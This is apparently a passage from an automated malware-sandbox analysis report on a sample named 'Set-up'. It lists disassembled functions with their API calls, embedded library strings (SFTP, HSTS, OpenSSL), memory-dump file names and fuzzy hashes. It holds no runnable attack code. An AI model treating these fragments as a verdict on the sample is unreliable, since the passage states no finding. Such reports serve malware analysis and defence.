MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00A763BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A763C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A763D6

Part of subcall function 00A7D8C0: GetTickCount.KERNEL32 ref: 00A7D968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A763ED

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: dac26f93b28e857abbf3ac2bc5c89bceeaec32a7d892d7ad5a10803991a0b86b
Instruction ID: 23bfae174ce5ef5cb7a0293d50d1ed02a8a8abab6abf4cd2756574196520b809
Opcode Fuzzy Hash: dac26f93b28e857abbf3ac2bc5c89bceeaec32a7d892d7ad5a10803991a0b86b
Instruction Fuzzy Hash: BA11F3B3D00A4467E7117625AC42BBF7268AF95724F088624FC4C5A282FB25DA94C2A3

Function 00B4E1F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4E209

Part of subcall function 00B44620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00B51478,?,?,?), ref: 00B44643

Strings

Unable to send FXP_REMOVE command, xrefs: 00B4E36B
SFTP Protocol Error, xrefs: 00B4E3AA
Unable to allocate memory for FXP_REMOVE packet, xrefs: 00B4E374
SFTP unlink packet too short, xrefs: 00B4E35A
Error waiting for FXP STATUS, xrefs: 00B4E3BD

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
API String ID: 1622878224-2749593575
Opcode ID: f4a6c85d8ce1d15894491453b5c32468a88f2e7077838226e648cf6f37a713b1
Instruction ID: bbbf85163ad190ec39d9a40bed0ac175ea8d579ce23e5865c2771a7423fed678
Opcode Fuzzy Hash: f4a6c85d8ce1d15894491453b5c32468a88f2e7077838226e648cf6f37a713b1
Instruction Fuzzy Hash: 9451A070904300AFD7219F24DC45B6BBBE8FF40314F1449ADF9AD97292E371EA14AB62

Function 00A66220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00A6623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A6624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00A6627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A66389

Strings

hsts.c, xrefs: 00A662C9, 00A662DB, 00A66339, 00A6634B
., xrefs: 00A66399

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: f326639d605b740515e568402429404fb6dde5df34f684d6828384a11501483d
Instruction ID: e7c99cf55a62219db4f88ddb7037f9d9ee437a6cae80e07a90794e7c7dfb22da
Opcode Fuzzy Hash: f326639d605b740515e568402429404fb6dde5df34f684d6828384a11501483d
Instruction Fuzzy Hash: B241A9F6D183446BEB10BF60AD46B5F37A89F14318F084438FD4E56243FA75E92886A3

Function 00DE4430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 00DE447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 00DE44C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 00DE44E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00DE4500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 00DE451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DE4546

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: 79580a64df73d59115ece4ab6ad58f664f6d87adafbe4505457cf79c97910a8a
Instruction ID: e07f4aa8fb99c259693fa3b422fff9a4ff0e1fec6a0cef2845d9a60d245cd936
Opcode Fuzzy Hash: 79580a64df73d59115ece4ab6ad58f664f6d87adafbe4505457cf79c97910a8a
Instruction Fuzzy Hash: 3A314FB290438567F720B636DC01BBB769CDB90354F08412CF84C961C1E779ED448372

Function 00CA2240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00C9F763,?,?,?,?,?), ref: 00CA2251
WideCharToMultiByte.KERNEL32 ref: 00CA2284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00CA22BD

Strings

ERR_CAPI_error, xrefs: 00CA231A
engines/e_capi.c, xrefs: 00CA2299, 00CA22D0, 00CA2342
engines/e_capi_err.c, xrefs: 00CA2321

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: 12464a256989e6c2cd2393105ea555fdc4fb911ab45f6094c6fc8d32dbb9cbf1
Instruction ID: 3f3711bba6fc9ecdc2b8f458bc13813206ffd51302c1ce6b24a39f7c40aa32ba
Opcode Fuzzy Hash: 12464a256989e6c2cd2393105ea555fdc4fb911ab45f6094c6fc8d32dbb9cbf1
Instruction Fuzzy Hash: 8D214DB1F053157BFB303663AC06B2B359CDB83B18F04413DF54899195EAFD48419792

Function 00DD28F0 Relevance: 10.3, APIs: 8, Instructions: 342COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,00DBDA6D,00000000,010F09B4,?,?,?,?,?), ref: 00DD299B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2A76
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00DD2A82
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2AAE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2ABA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DD2B3F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DD2C32
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,00DBDA6D,00000000,010F09B4,?,?,?,?,?), ref: 00DD2CB2

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 98a7c1f34d5817035f636342c4a9970a368f24d94da7c3b60ab47671f442954d
Instruction ID: 8c7708a5e4fce1d0923ecebdc184681a0095f1d2cce3f87bc6dffcf6959221ee
Opcode Fuzzy Hash: 98a7c1f34d5817035f636342c4a9970a368f24d94da7c3b60ab47671f442954d
Instruction Fuzzy Hash: CFD17D71A042149FCB14DF2CC884AAA7BE5FFA8314F19862AFC5987395D771EC40DBA1

Function 00C181F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00BBA9CE,000000D2), ref: 00C183A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BBA9CE), ref: 00C183C6

Part of subcall function 00C160E0: GetLastError.KERNEL32(00C17CCC,?,00000000,00C17127,00C17CCC,00000000,00C3CAB7,00A61A70), ref: 00C160E3
Part of subcall function 00C160E0: SetLastError.KERNEL32(00000000), ref: 00C161A5

Strings

crypto/err/err_local.h, xrefs: 00C18311, 00C18332, 00C18385, 00C183E8, 00C184BB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: 073e8861da26e7cf4fef4f109c0cd54c1761c0e67abd9504f7b2a0ed019c5dc2
Instruction ID: 98ea9736fd8d375593147036eaa8f56463c873b6e76661c31cd368c3577ca304
Opcode Fuzzy Hash: 073e8861da26e7cf4fef4f109c0cd54c1761c0e67abd9504f7b2a0ed019c5dc2
Instruction Fuzzy Hash: 5F81E5B0504B01AFE3239F28E885BE6B7E0FB4130CF444E1CE5E9872A5DB79A558DB50

Function 00A66730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A673F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A6741D
Part of subcall function 00A673F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00A67445

Part of subcall function 00AA47D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 00AA47FB
Part of subcall function 00AA47D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00AA480C
Part of subcall function 00AA47D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00AA4837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00A66844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00A66876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00A668FD

Strings

hsts.c, xrefs: 00A66748, 00A6675D, 00A66777, 00A6691D, 00A6694E, 00A6696F
unlimited, xrefs: 00A6686C
%256s "%64[^"]", xrefs: 00A66857

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: cc9f03fcfbbe0f9af4f03ebcba31490019c6ba1049056921f41c27867db97b46
Instruction ID: 9c62a222fd398453a45710aeb5070da13abe1c055e54523ccc480e1cdb7ee414
Opcode Fuzzy Hash: cc9f03fcfbbe0f9af4f03ebcba31490019c6ba1049056921f41c27867db97b46
Instruction Fuzzy Hash: 9D51F7B1D443417BEB109B30AE42A6B77B89F95704F144828FC59A7282FB35EA14D7A3

Function 00C58240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00C59265,?,00000400,00000000,?), ref: 00C58254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00C59265,?), ref: 00C58264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00C59265,?,?,?,?,?,?,00C59265,?,00000400,00000000,?), ref: 00C582C7

Strings

PEM_def_callback, xrefs: 00C582A1
Enter PEM pass phrase:, xrefs: 00C58279, 00C5828C
crypto/pem/pem_lib.c, xrefs: 00C582A8

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 9c4bf3c444ced897deb02be037e14e93e5be3c82f65d2e847c1e0a822983ed3d
Instruction ID: f7353c8df00ceb1aea9ffe70659e16e3a695857ab16416527a588e23be8052c0
Opcode Fuzzy Hash: 9c4bf3c444ced897deb02be037e14e93e5be3c82f65d2e847c1e0a822983ed3d
Instruction Fuzzy Hash: 77016DA6B0032037E1107566AC83F7F365CCB82755F140135FE08A6183E950DC0961B2

Function 00B08920 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B0895D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B08991
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B0899A
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B089AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B089B4
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B089B9

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_fileno_writeabortfreemalloc
String ID:
API String ID: 1064163434-0
Opcode ID: 1824e6f6de629ecf65bf5e45b28e50dbca4e6fac1c253d67cdc56c369d8e00d7
Instruction ID: 85baad5ffdb5663d431cd07fd26b14a0d8d29bbdc682e0fe0e6ec4422cac4d94
Opcode Fuzzy Hash: 1824e6f6de629ecf65bf5e45b28e50dbca4e6fac1c253d67cdc56c369d8e00d7
Instruction Fuzzy Hash: 33119EB0409704AFC340BF2AD64562EFFE4AF88750F41981EF9C887341EB7899408BA3

Function 00AC45C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00A95B6B,00000017,?,?), ref: 00AC4612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00AC4660

Strings

0123456789abcdef, xrefs: 00AC465B, 00AC466C
0123456789ABCDEF, xrefs: 00AC4683, 00AC4694

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: 68e456c143758da2bce633f099572839b592cc5a9e320ecab09d16215c1468e0
